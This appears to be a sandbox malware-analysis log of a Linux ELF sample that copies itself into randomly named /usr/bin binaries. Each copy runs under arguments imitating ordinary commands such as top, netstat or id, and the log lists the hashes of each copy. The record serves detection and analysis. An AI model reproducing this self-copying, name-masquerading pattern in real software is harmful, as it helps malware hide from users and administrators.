Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	-
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: 1.elf PID: 6427, Parent PID: 6205

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6428, Parent PID: 6427

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bjhrrojebv PID: 6428, Parent PID: 6427

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	/usr/bin/bjhrrojebv top 6205
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: bjhrrojebv PID: 6432, Parent PID: 6428

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	-
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: 1.elf PID: 6430, Parent PID: 6205

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6431, Parent PID: 6430

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bjhrrojebv PID: 6431, Parent PID: 6430

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	/usr/bin/bjhrrojebv gnome-terminal 6205
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: bjhrrojebv PID: 6433, Parent PID: 6431

General

Start time (UTC):	18:31:44
Start date (UTC):	26/10/2023
Path:	/usr/bin/bjhrrojebv
Arguments:	-
File size:	625878 bytes
MD5 hash:	305f5484460feb573c4a06d56e6ac96a

Chronological Activities

Analysis Process: 1.elf PID: 6436, Parent PID: 6205

General

Start time (UTC):	18:31:49
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6437, Parent PID: 6436

General

Start time (UTC):	18:31:49
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vlteqhfomz PID: 6437, Parent PID: 6436

General

Start time (UTC):	18:31:49
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	/usr/bin/vlteqhfomz "netstat -an" 6205
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: vlteqhfomz PID: 6438, Parent PID: 6437

General

Start time (UTC):	18:31:49
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	-
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: 1.elf PID: 6439, Parent PID: 6205

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6440, Parent PID: 6439

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vlteqhfomz PID: 6440, Parent PID: 6439

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	/usr/bin/vlteqhfomz uptime 6205
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: vlteqhfomz PID: 6443, Parent PID: 6440

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	-
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: 1.elf PID: 6441, Parent PID: 6205

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6442, Parent PID: 6441

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vlteqhfomz PID: 6442, Parent PID: 6441

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	/usr/bin/vlteqhfomz "grep \"A\"" 6205
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: vlteqhfomz PID: 6446, Parent PID: 6442

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	-
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: 1.elf PID: 6444, Parent PID: 6205

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6445, Parent PID: 6444

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vlteqhfomz PID: 6445, Parent PID: 6444

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	/usr/bin/vlteqhfomz su 6205
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: vlteqhfomz PID: 6449, Parent PID: 6445

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	-
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: 1.elf PID: 6447, Parent PID: 6205

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6448, Parent PID: 6447

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: vlteqhfomz PID: 6448, Parent PID: 6447

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	/usr/bin/vlteqhfomz id 6205
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: vlteqhfomz PID: 6450, Parent PID: 6448

General

Start time (UTC):	18:31:50
Start date (UTC):	26/10/2023
Path:	/usr/bin/vlteqhfomz
Arguments:	-
File size:	625878 bytes
MD5 hash:	41fc2d5615191266df1f6ab89f56e741

Chronological Activities

Analysis Process: 1.elf PID: 6453, Parent PID: 6205

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6454, Parent PID: 6453

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: wxysocrflf PID: 6454, Parent PID: 6453

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	/usr/bin/wxysocrflf id 6205
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: wxysocrflf PID: 6455, Parent PID: 6454

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	-
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: 1.elf PID: 6456, Parent PID: 6205

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6457, Parent PID: 6456

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: wxysocrflf PID: 6457, Parent PID: 6456

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	/usr/bin/wxysocrflf "echo \"find\"" 6205
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: wxysocrflf PID: 6459, Parent PID: 6457

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	-
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: 1.elf PID: 6458, Parent PID: 6205

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6460, Parent PID: 6458

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: wxysocrflf PID: 6460, Parent PID: 6458

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	/usr/bin/wxysocrflf bash 6205
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: wxysocrflf PID: 6463, Parent PID: 6460

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	-
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: 1.elf PID: 6461, Parent PID: 6205

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6462, Parent PID: 6461

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: wxysocrflf PID: 6462, Parent PID: 6461

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	/usr/bin/wxysocrflf top 6205
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: wxysocrflf PID: 6466, Parent PID: 6462

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	-
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: 1.elf PID: 6464, Parent PID: 6205

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6465, Parent PID: 6464

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: wxysocrflf PID: 6465, Parent PID: 6464

General

Start time (UTC):	18:31:55
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	/usr/bin/wxysocrflf id 6205
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: wxysocrflf PID: 6467, Parent PID: 6465

General

Start time (UTC):	18:31:56
Start date (UTC):	26/10/2023
Path:	/usr/bin/wxysocrflf
Arguments:	-
File size:	625878 bytes
MD5 hash:	4af31d012bbcff0a3da05560012a0665

Chronological Activities

Analysis Process: 1.elf PID: 6470, Parent PID: 6205

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6471, Parent PID: 6470

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6471, Parent PID: 6470

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	/usr/bin/ssrfvzfvpk pwd 6205
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6472, Parent PID: 6471

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	-
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: 1.elf PID: 6473, Parent PID: 6205

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6474, Parent PID: 6473

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6474, Parent PID: 6473

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	/usr/bin/ssrfvzfvpk "ifconfig eth0" 6205
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6476, Parent PID: 6474

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	-
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: 1.elf PID: 6475, Parent PID: 6205

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6477, Parent PID: 6475

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6477, Parent PID: 6475

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	/usr/bin/ssrfvzfvpk top 6205
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6480, Parent PID: 6477

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	-
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: 1.elf PID: 6478, Parent PID: 6205

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6479, Parent PID: 6478

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6479, Parent PID: 6478

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	/usr/bin/ssrfvzfvpk ifconfig 6205
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6481, Parent PID: 6479

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	-
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: 1.elf PID: 6482, Parent PID: 6205

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6483, Parent PID: 6482

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6483, Parent PID: 6482

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	/usr/bin/ssrfvzfvpk "route -n" 6205
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: ssrfvzfvpk PID: 6484, Parent PID: 6483

General

Start time (UTC):	18:32:01
Start date (UTC):	26/10/2023
Path:	/usr/bin/ssrfvzfvpk
Arguments:	-
File size:	625878 bytes
MD5 hash:	c7f6b1948208a5e292a0ce152567dd8f

Chronological Activities

Analysis Process: 1.elf PID: 6488, Parent PID: 6205

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6489, Parent PID: 6488

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6489, Parent PID: 6488

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	/usr/bin/bhmsjmfdgk "sleep 1" 6205
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6490, Parent PID: 6489

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	-
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: 1.elf PID: 6491, Parent PID: 6205

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6492, Parent PID: 6491

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6492, Parent PID: 6491

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	/usr/bin/bhmsjmfdgk whoami 6205
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6493, Parent PID: 6492

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	-
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: 1.elf PID: 6494, Parent PID: 6205

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6495, Parent PID: 6494

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6495, Parent PID: 6494

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	/usr/bin/bhmsjmfdgk "sleep 1" 6205
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6497, Parent PID: 6495

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	-
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: 1.elf PID: 6496, Parent PID: 6205

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6498, Parent PID: 6496

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6498, Parent PID: 6496

General

Start time (UTC):	18:32:06
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	/usr/bin/bhmsjmfdgk gnome-terminal 6205
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6501, Parent PID: 6498

General

Start time (UTC):	18:32:07
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	-
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: 1.elf PID: 6499, Parent PID: 6205

General

Start time (UTC):	18:32:07
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6500, Parent PID: 6499

General

Start time (UTC):	18:32:07
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6500, Parent PID: 6499

General

Start time (UTC):	18:32:07
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	/usr/bin/bhmsjmfdgk pwd 6205
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: bhmsjmfdgk PID: 6502, Parent PID: 6500

General

Start time (UTC):	18:32:07
Start date (UTC):	26/10/2023
Path:	/usr/bin/bhmsjmfdgk
Arguments:	-
File size:	625878 bytes
MD5 hash:	78478a175b52118257c1908b16bd07f5

Chronological Activities

Analysis Process: 1.elf PID: 6505, Parent PID: 6205

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6506, Parent PID: 6505

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ctjziyscga PID: 6506, Parent PID: 6505

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	/usr/bin/ctjziyscga "ls -la" 6205
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

Analysis Process: ctjziyscga PID: 6507, Parent PID: 6506

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	-
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

Analysis Process: 1.elf PID: 6508, Parent PID: 6205

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6509, Parent PID: 6508

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ctjziyscga PID: 6509, Parent PID: 6508

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	/usr/bin/ctjziyscga pwd 6205
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

Analysis Process: ctjziyscga PID: 6511, Parent PID: 6509

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	-
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

Analysis Process: 1.elf PID: 6510, Parent PID: 6205

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6512, Parent PID: 6510

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ctjziyscga PID: 6512, Parent PID: 6510

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	/usr/bin/ctjziyscga "netstat -antop" 6205
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

Analysis Process: ctjziyscga PID: 6515, Parent PID: 6512

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	-
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

Analysis Process: 1.elf PID: 6513, Parent PID: 6205

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6514, Parent PID: 6513

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ctjziyscga PID: 6514, Parent PID: 6513

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	/usr/bin/ctjziyscga id 6205
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

